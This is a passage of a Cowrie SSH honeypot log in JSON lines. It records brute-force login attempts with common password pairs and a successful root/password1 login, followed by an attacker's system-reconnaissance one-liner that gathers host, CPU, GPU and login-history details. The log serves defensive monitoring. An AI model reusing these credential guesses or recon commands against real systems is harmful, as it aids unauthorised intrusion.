{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:57:53.214882Z","src_ip":"212.227.235.229","session":"eb5c735720f9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:57:53.284157Z","src_ip":"212.227.235.229","session":"bcf9269a320b"}
{"eventid":"cowrie.login.failed","username":"middleware","password":"1qazXSW@","message":"login attempt [middleware/1qazXSW@] failed","sensor":"my-vps","timestamp":"2025-08-31T04:57:53.791278Z","src_ip":"212.227.235.229","session":"bcf9269a320b"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:57:54.920574Z","src_ip":"212.227.235.229","session":"bcf9269a320b"}
{"eventid":"cowrie.login.failed","username":"test1","password":"123456","message":"login attempt [test1/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:57:55.255668Z","src_ip":"212.227.235.229","session":"eb5c735720f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35838,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9ae3ed1174f","protocol":"ssh","message":"New connection: 212.227.235.229:35838 (1.2.3.4:22) [session: f9ae3ed1174f]","sensor":"my-vps","timestamp":"2025-08-31T04:57:56.561061Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:57:56.578892Z","src_ip":"212.227.235.229","session":"f9ae3ed1174f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:57:57.977720Z","src_ip":"212.227.235.229","session":"f9ae3ed1174f"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:57:58.151962Z","src_ip":"212.227.235.229","session":"eb5c735720f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51160,"dst_ip":"1.2.3.4","dst_port":22,"session":"41c4866c7401","protocol":"ssh","message":"New connection: 212.227.235.229:51160 (1.2.3.4:22) [session: 41c4866c7401]","sensor":"my-vps","timestamp":"2025-08-31T04:58:00.249008Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:58:00.269131Z","src_ip":"212.227.235.229","session":"41c4866c7401"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:58:00.503240Z","src_ip":"212.227.235.229","session":"41c4866c7401"}
{"eventid":"cowrie.login.failed","username":"shipping","password":"shipping","message":"login attempt [shipping/shipping] failed","sensor":"my-vps","timestamp":"2025-08-31T04:58:01.153698Z","src_ip":"212.227.235.229","session":"f9ae3ed1174f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36100,"dst_ip":"1.2.3.4","dst_port":22,"session":"cebd7b8814d0","protocol":"ssh","message":"New connection: 212.227.125.160:36100 (1.2.3.4:22) [session: cebd7b8814d0]","sensor":"my-vps","timestamp":"2025-08-31T04:58:01.860723Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:58:02.289120Z","src_ip":"212.227.125.160","session":"cebd7b8814d0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:58:02.289880Z","src_ip":"212.227.125.160","session":"cebd7b8814d0"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin1","message":"login attempt [admin/admin1] failed","sensor":"my-vps","timestamp":"2025-08-31T04:58:02.402731Z","src_ip":"212.227.235.229","session":"41c4866c7401"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:58:02.840173Z","src_ip":"212.227.235.229","session":"f9ae3ed1174f"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:58:03.713412Z","src_ip":"212.227.235.229","session":"41c4866c7401"}
{"eventid":"cowrie.login.success","username":"root","password":"password1","message":"login attempt [root/password1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:58:04.092881Z","src_ip":"212.227.125.160","session":"cebd7b8814d0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:58:05.101642Z","src_ip":"212.227.125.160","session":"cebd7b8814d0"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T04:58:05.102419Z","src_ip":"212.227.125.160","session":"cebd7b8814d0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:58:05.103176Z","src_ip":"212.227.125.160","session":"cebd7b8814d0"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:58:05.104311Z","src_ip":"212.227.125.160","session":"cebd7b8814d0"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T04:58:05.105400Z","src_ip":"212.227.125.160","session":"cebd7b8814d0"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:58:05.106207Z","src_ip":"212.227.125.160","session":"cebd7b8814d0"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:58:05.107169Z","src_ip":"212.227.125.160","session":"cebd7b8814d0"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T04:58:05.108524Z","src_ip":"212.227.125.160","session":"cebd7b8814d0"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T04:58:05.109201Z","src_ip":"212.227.125.160","session":"cebd7b8814d0"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:58:05.110196Z","src_ip":"212.227.125.160","session":"cebd7b8814d0"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:58:05.110982Z","src_ip":"212.227.125.160","session":"cebd7b8814d0"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:58:05.111847Z","src_ip":"212.227.125.160","session":"cebd7b8814d0"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:58:05.112216Z","src_ip":"212.227.125.160","session":"cebd7b8814d0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T04:58:05.523716Z","src_ip":"212.227.125.160","session":"cebd7b8814d0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:58:05.524595Z","src_ip":"212.227.125.160","session":"cebd7b8814d0"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:58:05.525637Z","src_ip":"212.227.125.160","session":"cebd7b8814d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51178,"dst_ip":"1.2.3.4","dst_port":22,"session":"8913cfb14110","protocol":"ssh","message":"New connection: 212.227.235.229:51178 (1.2.3.4:22) [session: 8913cfb14110]","sensor":"my-vps","timestamp":"2025-08-31T04:58:08.299871Z"}
{"eventid":"cowrie.session.closed","duration":"63.0","message":"Connection lost after 63.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:58:08.340434Z","src_ip":"212.227.125.160","session":"89330c866942"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:58:08.415637Z","src_ip":"212.227.235.229","session":"8913cfb14110"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp2